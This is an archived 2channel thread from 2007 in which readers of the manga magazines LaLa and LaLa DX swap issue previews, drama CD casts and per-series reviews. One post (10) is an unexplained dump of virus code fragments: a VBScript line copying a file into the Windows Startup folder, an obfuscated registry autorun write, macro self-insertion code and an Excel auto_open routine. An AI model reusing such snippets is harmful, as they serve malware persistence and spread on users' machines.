2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■ さあて、今月のLaLa・ララDX第41部 ■

1 :花と名無しさん:2007/01/20(土) 15:25:53 ID:???0
★羅列のお約束★
発売日前のネタバレ厳禁。羅列はOK。
羅列にネタバレを含む場合は、
一行目に「ネタバレあり」の注意書きを一文入れてください。
公式発売日の昼12時からネタバレ解禁。

詳しいネタバレキボンの人は下記のスレでおながいしましょう。
【早売りゲッター】総合スレ・十五冊目【ネタバレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1166260791/


前スレ:■ さあて、今月のLaLa・ララDX第40部 ■
http://comic7.2ch.net/test/read.cgi/gcomic/1166292604/

過去スレ倉庫
http://gcomic2ch.hacca.jp/lala/index.html

連載中作家など関連スレは>>2-5あたり (作家名五十音順)

2 :花と名無しさん:2007/01/20(土) 15:26:30 ID:???0
★白泉社限定★新人&受賞者に八言目!
http://comic6.2ch.net/test/read.cgi/gcomic/1159189021/
◆◆◆白泉系雑誌投稿者12◆◆◆
http://comic6.2ch.net/test/read.cgi/gcomic/1165748933/l50
麻生みこと・4
http://comic6.2ch.net/test/read.cgi/gcomic/1082713216/
樹なつみについて語ろう phase19
http://comic6.2ch.net/test/read.cgi/gcomic/1160936115/l50
草川為さん、どうでしょう? 5
http://comic6.2ch.net/test/read.cgi/gcomic/1147077231/
☆★金色のコルダ★☆呉由姫 part22
http://comic7.2ch.net/test/read.cgi/gcomic/1168153614/
□斎藤けん□
http://comic6.2ch.net/test/read.cgi/gcomic/1139756593/
【三日月パン】ささだあすか【パジャマでごろん】
http://comic6.2ch.net/test/read.cgi/gcomic/1087631934/
【ガッチャガチャ】橘 裕 #4【Honey】
http://comic6.2ch.net/test/read.cgi/gcomic/1128969400/
田中メカ6
http://comic6.2ch.net/test/read.cgi/gcomic/1145093157/
筑波さくら・3
http://comic6.2ch.net/test/read.cgi/gcomic/1141991359/
☆時計野はり☆
http://comic6.2ch.net/test/read.cgi/gcomic/1073056993/
彼氏彼女の事情について
http://comic6.2ch.net/test/read.cgi/gcomic/1150000580/

3 :花と名無しさん:2007/01/20(土) 15:27:19 ID:???0
【ソフト白泉系】なかじ有紀2【マターリ地味】
http://comic6.2ch.net/test/read.cgi/gcomic/1114866870/
【B.B.Joker】 にざかな 2 【4ジゲン】
http://comic6.2ch.net/test/read.cgi/gcomic/1153977394/
【桜蘭高校ホスト部】葉鳥ビスコ16【千年の雪】
http://comic6.2ch.net/test/read.cgi/gcomic/1162992496/
★★ひかわきょうこについて語ろう その8★★
http://comic7.2ch.net/test/read.cgi/gcomic/1168889963/
樋野まつり★ヴァンパイア騎士【第十夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1161097987/
☆★平井摩利〜火宵の月〜★☆
http://comic6.2ch.net/test/read.cgi/gcomic/1019049308/
三上チト
http://comic6.2ch.net/test/read.cgi/gcomic/1155459799/
【遙かなる時空の中で】水野十子67【王様ゲーム】
http://comic7.2ch.net/test/read.cgi/gcomic/1168788947/
緑川ゆき 6
http://comic6.2ch.net/test/read.cgi/gcomic/1148310376/
ぽっぷん+テケテケ=森生まさみ♪ その6
http://comic6.2ch.net/test/read.cgi/gcomic/1151969183/
柳原望作品を語ろう
http://comic6.2ch.net/test/read.cgi/gcomic/1043794406/
※米沢リカ※
http://comic6.2ch.net/test/read.cgi/gcomic/1068295228/
▼・w・▼ 六本木綾 ▼・w・▼
http://comic6.2ch.net/test/read.cgi/gcomic/1045315223/

4 :花と名無しさん:2007/01/20(土) 15:44:03 ID:???O
>>1
乙華麗〜

5 :花と名無しさん:2007/01/20(土) 15:48:48 ID:???0
>>1乙!

しかし関連スレがほとんどcomic6のまま…?

6 :2訂正:2007/01/20(土) 15:55:38 ID:???0
★白泉社限定★新人&受賞者に八言目!
http://comic7.2ch.net/test/read.cgi/gcomic/1159189021/
◆◆◆白泉系雑誌投稿者12◆◆◆
http://comic7.2ch.net/test/read.cgi/gcomic/1165748933/l50
麻生みこと・4
http://comic7.2ch.net/test/read.cgi/gcomic/1082713216/
樹なつみについて語ろう phase19
http://comic7.2ch.net/test/read.cgi/gcomic/1160936115/l50
草川為さん、どうでしょう? 5
http://comic7.2ch.net/test/read.cgi/gcomic/1147077231/
☆★金色のコルダ★☆呉由姫 part22
http://comic7.2ch.net/test/read.cgi/gcomic/1168153614/
□斎藤けん□
http://comic7.2ch.net/test/read.cgi/gcomic/1139756593/
【三日月パン】ささだあすか【パジャマでごろん】
http://comic7.2ch.net/test/read.cgi/gcomic/1087631934/
【ガッチャガチャ】橘 裕 #4【Honey】
http://comic7.2ch.net/test/read.cgi/gcomic/1128969400/
田中メカ6
http://comic7.2ch.net/test/read.cgi/gcomic/1145093157/
筑波さくら・3
http://comic7.2ch.net/test/read.cgi/gcomic/1141991359/
☆時計野はり☆
http://comic7.2ch.net/test/read.cgi/gcomic/1073056993/
彼氏彼女の事情について
http://comic7.2ch.net/test/read.cgi/gcomic/1150000580/

7 :3訂正:2007/01/20(土) 15:56:10 ID:???0
【ソフト白泉系】なかじ有紀2【マターリ地味】
http://comic7.2ch.net/test/read.cgi/gcomic/1114866870/
【B.B.Joker】 にざかな 2 【4ジゲン】
http://comic7.2ch.net/test/read.cgi/gcomic/1153977394/
【桜蘭高校ホスト部】葉鳥ビスコ16【千年の雪】
http://comic7.2ch.net/test/read.cgi/gcomic/1162992496/
★★ひかわきょうこについて語ろう その8★★
http://comic7.2ch.net/test/read.cgi/gcomic/1168889963/
樋野まつり★ヴァンパイア騎士【第十夜】
http://comic7.2ch.net/test/read.cgi/gcomic/1161097987/
☆★平井摩利〜火宵の月〜★☆
http://comic7.2ch.net/test/read.cgi/gcomic/1019049308/
三上チト
http://comic7.2ch.net/test/read.cgi/gcomic/1155459799/
【遙かなる時空の中で】水野十子67【王様ゲーム】
http://comic7.2ch.net/test/read.cgi/gcomic/1168788947/
緑川ゆき 6
http://comic7.2ch.net/test/read.cgi/gcomic/1148310376/
ぽっぷん+テケテケ=森生まさみ♪ その6
http://comic7.2ch.net/test/read.cgi/gcomic/1151969183/
柳原望作品を語ろう
http://comic7.2ch.net/test/read.cgi/gcomic/1043794406/
※米沢リカ※
http://comic7.2ch.net/test/read.cgi/gcomic/1068295228/
▼・w・▼ 六本木綾 ▼・w・▼
http://comic7.2ch.net/test/read.cgi/gcomic/1045315223/

8 :1:2007/01/20(土) 15:56:59 ID:???0
>>5
すまん、言われるまで気付かなかった…訂正しましたorz

9 :花と名無しさん:2007/01/21(日) 13:06:02 ID:XI/d46Sp0
>>1
乙華麗

10 :花と名無しさん:2007/01/21(日) 16:45:31 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


11 :花と名無しさん:2007/01/22(月) 04:00:04 ID:???0
>>1

12 :花と名無しさん:2007/01/22(月) 12:31:38 ID:???0
>>1乙〜


13 :花と名無しさん:2007/01/22(月) 17:23:21 ID:???O
>>1
乙でした

14 :花と名無しさん:2007/01/22(月) 23:12:06 ID:???O
テンプレ明日には来るかな
最近読めるの増えたから発売日が待ち遠しいよ

15 :花と名無しさん:2007/01/23(火) 13:05:01 ID:???0
3月号テンプレ

表紙(ヴァンパイア)…
全サ(ホスト部・遙か)…
巻頭(ヴァンパイア)…
ホスト部…
コルダ…
ビューティー…
メイド様…
お兄ちゃん…
モンスター…
デーモン…
4ジゲン…
ペンギン…
王様ゲーム…
八葉さん…
りんご組…
番長さま…
らぶ・ちょっぷ…
キスよりも…


付録(ヴァンパイアブレス)…
4月号表紙(コルダ)…
4月号巻頭(コルダ)…
3月号総評…

16 :花と名無しさん:2007/01/23(火) 13:06:20 ID:???0
4月号予告
表紙&巻頭カラー「金色のコルダ」
ふろく「LaLaトキ☆メキドラマCD」
(コルダ・メイド様・お兄ちゃん・龍の花)
BIG長編読切カラー60P「HEAVENカンパニー」なかじ有紀
読切「あの日のきみへ還る」ふじつか雪
連載再開「龍の花わずらい」
休載「王様ゲーム」

テンプレ初製作なので、間違ってたりおかしかったりしたらスマソ

17 :花と名無しさん:2007/01/23(火) 13:07:49 ID:???0
LaLaDX3月号予告
表紙&カラー40P「遙かなる時空の中で」
巻頭カラー50P「夏目友人帳」
「あぁ愛しの番長さま」特別編
カラー50P「私のシンデレラ」川瀬夏菜
Wクライマックス
「しにがみのバラッド」「金魚奏」
読切
あきづき空太・香藤しま・街田シカク・
辻田りり子・響ワタル・桜井夜

18 :花と名無しさん:2007/01/23(火) 13:41:31 ID:???0
>>15-17
乙です。
メイド様ドラマCDか…噂してたらお兄ちゃんもなるとはw

19 :花と名無しさん:2007/01/23(火) 13:55:00 ID:???O
乙です!
メイド様より、お兄ちゃんのドラマCD化に驚きだ。

20 :花と名無しさん:2007/01/23(火) 14:09:53 ID:???0
乙〜

王様もう休載か。読めるものが1つ減った(;´Д`)
そろそろ遙か4が来るのかなー
寺の読切は久し振りの人もいるね

21 :花と名無しさん:2007/01/23(火) 15:04:22 ID:???O
何故お兄ちゃん…

22 :花と名無しさん:2007/01/23(火) 15:54:49 ID:???O
ドラマCDって言ってもオマケのやつなんだね・・・
ホストや吸血鬼は正式にお金を取る商品に格上げしたからなぁ

どうせならお兄ちゃんより番長がよかった
いや、お兄ちゃんも好きは好きだけどさ、
オカマ兄はよほど上手い声優じゃないとサムくなりそうで

23 :花と名無しさん:2007/01/23(火) 16:04:29 ID:???0
ヲカマ兄をはじめとする、今回初めてドラマCDになった作品のキャラは
誰々がやるって発表は未掲載なのかな?>ゲッターさま

24 :花と名無しさん:2007/01/23(火) 16:10:33 ID:???O
自分も、どうせなら番長がよかったな…
でも、声つき長男が、どんななるのか興味。

25 :花と名無しさん:2007/01/23(火) 17:06:24 ID:???0
コルダメイドは人気あるからまぁ妥当だね>CD化
自分はお兄ちゃんよりも龍がメンバーに入ってることに驚き
草川ファンだけどそんな人気あると思ってなかったしw

26 :花と名無しさん:2007/01/23(火) 17:24:55 ID:???0
>>22
金も取るが、少し前の号で付録にもついてたよ>ホスト吸血鬼

27 :花と名無しさん:2007/01/23(火) 17:40:41 ID:???0
>>23
ゲッター様ではありませんが、新発表のキャストだけ


・「会長はメイド様!」
美咲:小林沙苗
碓氷:杉田智和

・「龍の花わずらい」
シャクヤ:中原麻衣
ルシン:杉山紀彰
クワン:遊佐浩二

・「お兄ちゃんと一緒」
桜:福圓美里
正:近藤隆
剛:鈴村健一



コルダは柚木と志水の撮り下ろしナレーション+ダイジェストドラマだそうです。


28 :花と名無しさん:2007/01/23(火) 18:28:23 ID:???0
え、次男と四男スルー?

29 :花と名無しさん:2007/01/23(火) 18:35:44 ID:???0
志水のナレーション…

30 :花と名無しさん:2007/01/23(火) 18:38:33 ID:???O
ああ・・・龍のキャストが微妙だよママン・・・
ヘタク(ryだったりイメージ合ってなかったり

31 :花と名無しさん:2007/01/23(火) 20:01:11 ID:???O
まだ聞いてないのにそんなの分かるのか

32 :花と名無しさん:2007/01/23(火) 20:04:48 ID:???0
声ヲタさんも中にはいるからな
声優の名前聞いたら大体のイメージは浮かぶんだろうきっと

33 :花と名無しさん:2007/01/23(火) 20:05:59 ID:???0
ルシンとクワンの声はいまいちイメージ湧かないがシャクヤは中々合ってると思うが

34 :花と名無しさん:2007/01/23(火) 20:30:54 ID:???O
ああっすみません、声優はそんな詳しいわけではないです

シャクヤ=ミルモでポンの楓
ルシン=NARUTOのサスケ
クワン=BLEACHの市丸ギン

これら↑を演じてる時の声で思い浮かべたもんで・・・

35 :花と名無しさん:2007/01/23(火) 20:34:44 ID:???0
>>34
自分から見たら十分詳しいと思うぞ
言われてもサッパリわからんw

36 :花と名無しさん:2007/01/23(火) 20:35:27 ID:???0
八葉さん・・・
これって誰のためにあるんだろ?コーエーの宣伝枠?

37 :花と名無しさん:2007/01/23(火) 20:39:48 ID:???0
杉山さんはあんまり聞かないけど遊佐さんは吹き替えやらBLゲやらアニメ脇役で良く聞く声だよね
中原さんは正直ファンなので主人公目当てに申し込みそうな予感('A`)ペッポ大好き

それよりもメイド様の声優に(*´Д`)ハアハア

38 :花と名無しさん:2007/01/23(火) 20:44:24 ID:???0
>>37
いや、付録だよ?落ち着いて…
中原さんて声優さんにしては可愛いなと思った記憶がスレ違いスマソ




39 :花と名無しさん:2007/01/23(火) 20:58:59 ID:???0
付録かよ 最近の付録は豪華だなぁ…
そういやコルダとかのCD付録一度も聞いたことないや

40 :花と名無しさん:2007/01/23(火) 21:00:48 ID:???0
毎年この時期にはCDの付録が付くような…ここ数年かな

41 :花と名無しさん:2007/01/23(火) 21:08:07 ID:???0
ルシンの人ってサスケでありブリーチの石田だよね。
市丸ギンといい色気のある声ってイメージだ>龍

42 :花と名無しさん:2007/01/23(火) 21:42:39 ID:???O
個人的にはオカマ兄の近藤さんが衝撃だw
高め声でくるのか、いっそキモめでくるのか
楽しみになってきた

つか今回は白泉常連じゃなくて珍しい面子できたな

43 :花と名無しさん:2007/01/23(火) 21:49:30 ID:???O
意外な作品の音声化で、ちょっと楽しみ。
これからも、決まった作品だけじゃなくて色々やってほしい。

44 :花と名無しさん:2007/01/23(火) 22:07:34 ID:???0
四ジゲンとかな

45 :花と名無しさん:2007/01/23(火) 22:14:36 ID:???0
テンプレお借りします。ネタバレあるかも。

表紙(ヴァンパイア)… しっかり付録は身に付けてるね。
           7月号もの時も黒い背景に制服の2人だったな。新鮮味無い。
全サ(ホスト部・遙か)… 欲しくは無いが、ファンは喜びそう。
巻頭(ヴァンパイア)… 色々新キャラ出たけど、これからの話に関わるのかな。最後の方エロい。
ホスト部… 何か盛り沢山で楽しい。ボサノバや猫澤や黒ハニーも出たし。
      馨が切なくて、鏡夜が黒かった。
コルダ… 音楽とか妖精とか関係ない普通の恋愛漫画に見えたが、初めて月森が可愛く見えた。
ビューティー…毎回1ページ目でエロい妄想させる気なんだろうか?
      でもどこカットしたか分からん上に、前髪逆に伸びてないか?
メイド様… 最初の2ページで挫折しそうになった。何とか最後まで見たが、別に見なくても良かった。
お兄ちゃん… 映画村行った事ないけど楽しいのかな。ここで最終回でもいい。続く必要なし。
モンスター… 葉月が岐阜の人じゃ昔いじめられてたとかでは無いのね。嫌う理由分からん。
      でもザッピング的な演出はちょっと楽しかった。
デーモン… ミカは心配なさそうだけどK2は?続き気になるなぁ。
4ジゲン… 犬猫ってチョコで死ぬの?ちょっと笑えないネタだ…。
ペンギン… まだ劇中劇引っ張るんだ…。
王様ゲーム… 今まで様子見だったけど、興味出てきた。でも次休みなのね。
八葉さん… 時々見参ってまた来るのか?正直いらない。
りんご組… 入学から卒業までの3年間連載だったのか。お疲れ様。
番長さま…笑えた。いいギャグ漫画だ。 この新キャラがこれからも出るとうざいかも。
らぶ・ちょっぷ… やっと終わった。あまり最終回ぽく無かったけどとにかく終わった。
          次はDXらしいがもう本誌に戻ってこなくていい。
キスよりも… いろいろありえないけど面白く読めた。弟が可愛い。
付録(ヴァンパイアブレス)…これであなたも守護係に変身♥…。
            前にペンダント引き取ってくれた小学生に今度見せてみる。
4月号表紙(コルダ)… たまには女の子達を見たいが無理だろうな。
4月号巻頭(コルダ)… 音楽の話を進めて欲しい。
3月号総評… エロを連想させる場面が目に付いた。とくにメイドはキモイ。

46 :花と名無しさん:2007/01/23(火) 22:51:48 ID:???O
ちょw四ジゲンww
なら最終回だったしりんご組も記念にやってしまえばいい

47 :花と名無しさん:2007/01/24(水) 01:13:04 ID:???0
テンプレ乙!ネタバレありかも

表紙(ヴァンパイア)… たまには黒背景意外も見たいなー
全サ(ホスト部・遙か)… スルー
巻頭(ヴァンパイア)… 子供がオッドアイだったのは特に意味無し?優姫が零を意識し出して良い感じだとオモ
            あと枢エロスw
ホスト部… ゲームの新キャラ多いね 自分は白組派だw
コルダ… なんか白くないか?いつもこんなんだっけ?
ビューティー… まあ今の所読めるかな カットモデルってそんな頻繁に切らせるもんなの?
メイド様… 全体的に萎え
お兄ちゃん… 早く終われすぐ終われ
モンスター… 七花があのままだったらもっと嫌いになってたので一応気付いて良かった。葉月良い子だな。
デーモン… K2がどうなってるのかなー毎回気になる展開で面白く読んでる。
4ジゲン… チョコネタが笑えなくてorz 恋をする人好きだったのに
ペンギン… キスシーンは作者的にすごく盛り上げたいんだろうけどすごい冷めた 読者は男同士って分かってるんだし
      やっぱり男に女役は無理だろ('A`) まだ引っ張るのかよ…
王様ゲーム… あのお姉さん系の人だったんだね女王 来月休載かあ
八葉さん… なんで戻ってきてるの?
りんご組… お疲れさまでした 自分は読み始めたの途中からだったからよく分からないんだけど三年間を描いてたんだw
番長さま… 加藤の妄言が全てを物語っている 子招き人形とか小ネタが好き
らぶ・ちょっぷ… まめとかカンタロとか意味Neeeee 自分にあったカラーの作品を描いて欲しい…
キスよりも… やっぱ教師かよ('A`)弟寝てるからって隣でヤろうとするなよ('A`) 好きになる過程とか絵は好きなんだけどな


付録(ヴァンパイアブレス)… 超待望ってどの層から?
4月号表紙(コルダ)… キャラブックの表紙もデジャヴだったし前の表紙は免許証wだったしもうちょっと構図考えて欲しい
4月号巻頭(コルダ)… 働かせ過ぎじゃないかwガンガレ
3月号総評… 押し倒しが多かった印象。

48 :花と名無しさん:2007/01/24(水) 01:36:25 ID:???0
テンプレいただきます。ネタバレあるかも。


表紙(ヴァンパイア)… いいのでは。
全サ(ホスト部・遙か)… いらない。
巻頭(ヴァンパイア)… オッドアイの子は師匠が追ってるヴァンパイア?
ホスト部… つまらん。
コルダ… 月森、お化け屋敷は平気なのか。
ビューティー… 妙にエロい場面を想像させるのしつこい。
メイド様… もう〆に入ってください。
お兄ちゃん… 修学旅行までついていくのか…きもい。もう終わって良いよ。
モンスター… 結構好きかも。さらっと読める。
デーモン… K2はどうなったんだろう。
4ジゲン… 笑えない…
ペンギン… まだ映画の話続くのかー、長い。
王様ゲーム… うーん。こういう話は苦手だ。
八葉さん… 笑った。でも何故今更載せるんだ?
りんご組… いきなり終わりかあ。新作書くのかな?
番長さま… ネタ切れ?今回いまいち。
らぶ・ちょっぷ… 打ち切り?尻切れトンボだったな。
キスよりも… いつも男女の顔が一緒。成人男性と16歳ってロリっぽくてやだ。



付録(ヴァンパイアブレス)… うーん。
4月号表紙(コルダ)… 華やかにお願いします。
4月号巻頭(コルダ)… いいのでは。
3月号総評… なんか物足りない。


49 :花と名無しさん:2007/01/24(水) 03:14:07 ID:???O
確かに白泉社にしては新鮮なキャストかも
常連なのは鈴村くらい?(花ゆめ含め)

どれも楽しみだw

50 :花と名無しさん:2007/01/24(水) 03:34:41 ID:???0
声オタとしては見逃せないキャストだけどな
杉田なんかは最近ハルヒとかで人気だし求めてる人も多いんじゃないか

LaLaで求められてるかは知らないが

51 :花と名無しさん:2007/01/24(水) 08:08:00 ID:???0
ハルヒは女キャラ女声優は人気だけど男はあまり…
どちらかといえば銀魂の銀さんの人って方が女性読者には通じるかな

52 :花と名無しさん:2007/01/24(水) 13:33:28 ID:???O
アンジェリークのフランシスはやはりマイナーなのか…。

53 :花と名無しさん:2007/01/24(水) 14:32:20 ID:???0
てんぷら豚です。
表紙(ヴァンパイア)… 黒いねぇ
全サ(ホスト部・遙か)… いらないw
巻頭(ヴァンパイア)… 微エロだねぇ
ホスト部… 漫画職人なイメージ。安定してる
コルダ… 目元口元アップばっかりで単調
ビューティー… キモイミスリード狙いはやめてくれー
メイド様… ただただキモイさー
お兄ちゃん… 炉利はつらいさー
モンスター… 大ゴマすぎるさー
デーモン… K2はどうなった!?お兄さんかわいい
4ジゲン… チョコ怖い
ペンギン… 引っ張るねーでも本編より練れてる気はする
王様ゲーム… なんか皆コスプレっぽいね
八葉さん… 不覚にもワロタ
りんご組… おつかれさまでした
番長さま… おもいきったネタだね
らぶ・ちょっぷ… 打ち切り臭が漂ってる
キスよりも… 教師と16歳なんだし清くいこうぜ?


付録(ヴァンパイアブレス)… 激しくイラね
4月号表紙(コルダ)… さっぱりした絵ならなんでもいいです
4月号巻頭(コルダ)… コマ構成とか劣化しすぎ。頑張ってください。
3月号総評… なんつーか微エロ多すぎ 萌えとエロは独立した別感情だ!

54 :花と名無しさん:2007/01/24(水) 14:45:17 ID:???O
質問です
ZIGZAGは最終回を迎えたのですか?
次回長編読み切りって…
最近読んでいなかったので、教えてください

55 :花と名無しさん:2007/01/24(水) 15:59:37 ID:???0
次回の読み切りはZIGZAGサブキャラの話で、番外編てことだよね?

…あまりいつも力入れて読んでないんで、自信無いスマソ
つか、自分もそこどうなのか知りたかった

56 :花と名無しさん:2007/01/24(水) 16:53:09 ID:???0
ZIGZAGは5月号から再開って書いてたよ。

57 :花と名無しさん:2007/01/24(水) 16:55:12 ID:???0
ペンギン、小児ガンて国指定の難病だから医療費は国負担だとどっかで見た気が

58 :花と名無しさん:2007/01/24(水) 17:12:49 ID:???0
ほんとだ。
当時は自己負担だったとか?そんなことないだろうけど。

59 :花と名無しさん:2007/01/24(水) 17:48:44 ID:???O
ZIGZAGの件聞いた者です
55さん、56さん、ありがとうございました


60 :花と名無しさん:2007/01/24(水) 19:26:22 ID:???0
テンプレお借りします  ネタバレあり

表紙(ヴァンパイア)…前にもこんな表紙見たようなデジャブ
全サ(ホスト部・遙か)…スルー
巻頭(ヴァンパイア)…どんどんキャラ増産されてくな…夜間クラスのキャラの絞った話が読みたい
ホスト部…時々作者のエゴをキャラに言わせてるなーと感じるとこが微妙に嫌
コルダ…月森微笑ましいw絵が能面的になってきた
ビューティー…冒頭このパターンで続けるのは確かにしつこい…ニコが綺麗になってく過程は見たい気もする
メイド様…あー…なんだか自分の嫌いなヒロインマンセー展開になってきた碓氷の鬱ネタもあざとそう
お兄ちゃん…もういいよ…長男ほんとうざすぎるよ
モンスター…今のララの中で一番さわやかな漫画だと思う。津田の漫画が清涼剤になるとは
デーモン…香山さん可愛いな…報われなさすぎで可哀相だな…
4ジゲン…最後のネタはブラックすぎるんじゃあ
ペンギン…隠れやおい映画だからヒットしたんだろ。観客腐女子っぽいもん
王様ゲーム…まだ世界観がよくわからない…次休みだし
八葉さん…スルー
りんご組…お疲れ
番長さま…なんか彩花みんの漫画を彷彿とさせた…何故かはわからんが
らぶ・ちょっぷ…まめぞうの存在意義はどこに行った
キスよりも…>>47同意。読みきりだからしゃーないけど展開も唐突で強引杉

付録(ヴァンパイアブレス)…いらないなあ
4月号表紙(コルダ)…がんばって
4月号巻頭(コルダ)…酷使されてるねえ
3月号総評…ガイシュツだけど微エロ多すぎ。エロ自体は否定しないけど
シチュエーション的に萌えない。エロ描いてもいいから工夫するとか頭を使ってください


61 :花と名無しさん:2007/01/24(水) 19:37:08 ID:???0
マツモトの1ページ目はこれからもずっとあの路線でいくのか

62 :花と名無しさん:2007/01/24(水) 19:56:09 ID:???0
テンプレ借ります。ありがd!ネタバレ注意。

表紙(ヴァンパイア)…バックが黒くてあの絵柄だと、少し買いづらい…
全サ(ホスト部・遙か)…興味ない。
巻頭(ヴァンパイア)…枢様と優姫が抱き合ってるシーンがエロい。
ホスト部…馨かわいそう…
コルダ…いつもよりかは読めた。
ビューティー…やっぱりヒーローは完璧超人設定なのね。
メイド様…苦手なのでスルー
お兄ちゃん…好きなんだけど、もうそろそろ飽きてきた。
モンスター…葉月に好感。七花も今回の話で自分の悪いとこに気づいたのは良かった。
デーモン…K2生きてるよね?死んでないよね…?
4ジゲン…今回イマイチ。
ペンギン…目が滑ってなかなか読めない…
劇中劇の描写があまりにもちゃちくて、読んでるこっちが恥ずかしくなる。
王様ゲーム…続き気になる。次号休みなのは残念。
八葉さん…まあまあ。
りんご組…お疲れ様でした。好きだったので、終わるの寂しい。
番長さま…バカバカしいノリは好き。でも、加藤の発情はいただけない。
この漫画は、加藤のそうか萌えが前面に出てこない方が好き。
らぶ・ちょっぷ…お疲れ様でした。
次のデラにこんぺいとダーリンが載るのか…この話甘ったるくて苦手だ。
キスよりも…結構好き。テンポ良く読めた気がする。鉄兵かわいい。


付録(ヴァンパイアブレス)…いらない。
4月号表紙(コルダ)…いいんじゃない。
4月号巻頭(コルダ)…ふーん。
3月号総評…読み応えは普通。
次号はふじつかさんの読みきりと龍花再開に期待。


63 :花と名無しさん:2007/01/24(水) 21:13:06 ID:???0
読了記録。テンプレ感謝。

表紙(ヴァンパイア)…暗い・・
全サ(ホスト部・遙か)…興味なし
巻頭(ヴァンパイア)…一応現代ものなんだね?頼ちゃん可愛い
ホスト部…今回いまいちかも。馨かわいそ
コルダ…こんな絵だっけ?何が面白いのか分からない。主人公かわいくない性格だ
ビューティー…あのガリっぷりは設定だったのか。一ページ目のエロ不要
メイド様…一ページめのエ(ry。相変わらず二人の世界だなあ
お兄ちゃん…どこに行ってもついてくるって怖いよ…自立できないんじゃないの
モンスター…面白いんだけど、カレカノ化しまくり。二人の個性がまるっきり有馬と雪野に
デーモン…なんで赤龍は聖典に愛されると思ったんだろう
4ジゲン…今回は不発気味
ペンギン…まだ映画続くのか。うんざり
王様ゲーム…面白くなってきたじゃないか。王妃可愛いな
八葉さん…いらん
りんご組…お疲れさん
番長さま…迷走してるような…。もう終わったほうがいい
らぶ・ちょっぷ…随分あっさりした終わり方。まめで締めないのか
キスよりも…いいんだけど、後だしで色々出てくるのがなぁ


付録(ヴァンパイアブレス)…あーそんなのあったっけ
4月号表紙(コルダ)…この人絵綺麗だけどセンスないよな
4月号巻頭(コルダ)…この漫画の何が面白いのか理解不能
3月号総評…いいのと悪いのがはっきりしてた


64 :花と名無しさん:2007/01/24(水) 21:38:22 ID:???0
4ジゲン不評だな…今回の最後のネタは引くよな…流石に

65 :花と名無しさん:2007/01/24(水) 21:45:48 ID:???0
4ジゲン気持ち悪かったよ。不愉快。

66 :花と名無しさん:2007/01/24(水) 22:08:13 ID:???0
テンプレお借りします  ありがとうございます。

表紙(ヴァンパイア)… 黒々ですね
全サ(ホスト部・遙か)… あったっけ
巻頭(ヴァンパイア)… まり亜ってもう家に帰ったのかな
ホスト部…騎馬戦が楽しみだ(あるのか?)
コルダ… 意外と楽しそうだね
ビューティー…前ヒロインと名前似てない? ヒーローが天才ってのは秋田。
メイド様… 主人公、前に男子の耳ひきちぎってなかったか?
お兄ちゃん… 主人公モテモテだね☆ 魅力がいまいちわかんないけど
モンスター… メインが二人とも性格がまともになってきて良い
デーモン… K2は…
4ジゲン… 委員長とばあちゃんネタがいいね。
ペンギン… 自分だったらもう寝てるよこの映画
王様ゲーム…親友が遙か3の誰かに似てる
八葉さん… りんごの代わり?
りんご組… お疲れ様でした
番長さま… ふーん
らぶ・ちょっぷ… 漫画男の存在意義なかったね
キスよりも… へー


付録(ヴァンパイアブレス)… つけてくれなかった。
4月号表紙(コルダ)… 楽器も描いて欲しいなー
4月号巻頭(コルダ)… がんばってください
3月号総評… なんか、内容が薄かった??


67 :花と名無しさん:2007/01/24(水) 22:09:32 ID:???0
感想が思い浮かんだのだけられっつ

ビューティー…カットした後どう変わったのかよくわかんなかった
モンスター…王子いい奴。七花のツヤベタが汚いなと思って見てた
4ジゲン…不快。最後のネタさえ無ければ普通だったのに…
ペンギン…キスシーンで色めきたつとことか、主人公どう見ても腐女子。よだれはやめろ
番長さま…アベック(死語)わろた
キスよりも…弟カワユス 結構好きなだけに、無理にエロは入れなくてもよかった

68 :花と名無しさん:2007/01/24(水) 22:13:03 ID:???0
>>64-65
たまにこういうのが入るのがにざかなクオリティ。


69 :花と名無しさん:2007/01/24(水) 22:13:50 ID:???0
なるべくエロ入れるよう要請してるのかね?

70 :花と名無しさん:2007/01/24(水) 22:44:24 ID:???0
>4ジゲン
アナウンサーの「犬・猫12匹の〜」の台詞さえ無かったら……ねぇ。
あの具体的な数値はキッツイ……『中毒症状』だけで誤魔化しておけば良いものを……。

71 :花と名無しさん:2007/01/24(水) 22:46:27 ID:???0
まあでも過失だからねぇ…。恋をする人の報われなさの過剰演出ということで
特に不快感は感じなかった自分は異常なのかもしれない。

72 :花と名無しさん:2007/01/24(水) 22:52:32 ID:???0
報われなさってのとは違うと思うがなあ…

73 :花と名無しさん:2007/01/24(水) 22:57:04 ID:???O
犬猫がチョコNGとは知らなかった、いい勉強になった

74 :花と名無しさん:2007/01/24(水) 23:00:16 ID:???0
あとタマネギも中毒を起こすよ。

75 :花と名無しさん:2007/01/24(水) 23:01:53 ID:???0
別に犬とネコの話は気にならなかった
でも今回はあまり面白くなかったかな

76 :花と名無しさん:2007/01/24(水) 23:18:51 ID:???O
犬猫に、チョコあげてみよ〜…て馬鹿が出たら、どーする気なんだ…

77 :花と名無しさん:2007/01/24(水) 23:24:16 ID:???0
どうもしないだろう

78 :花と名無しさん:2007/01/24(水) 23:26:43 ID:???0
そんなバカつか低年齢層が読むような漫画なのかララは

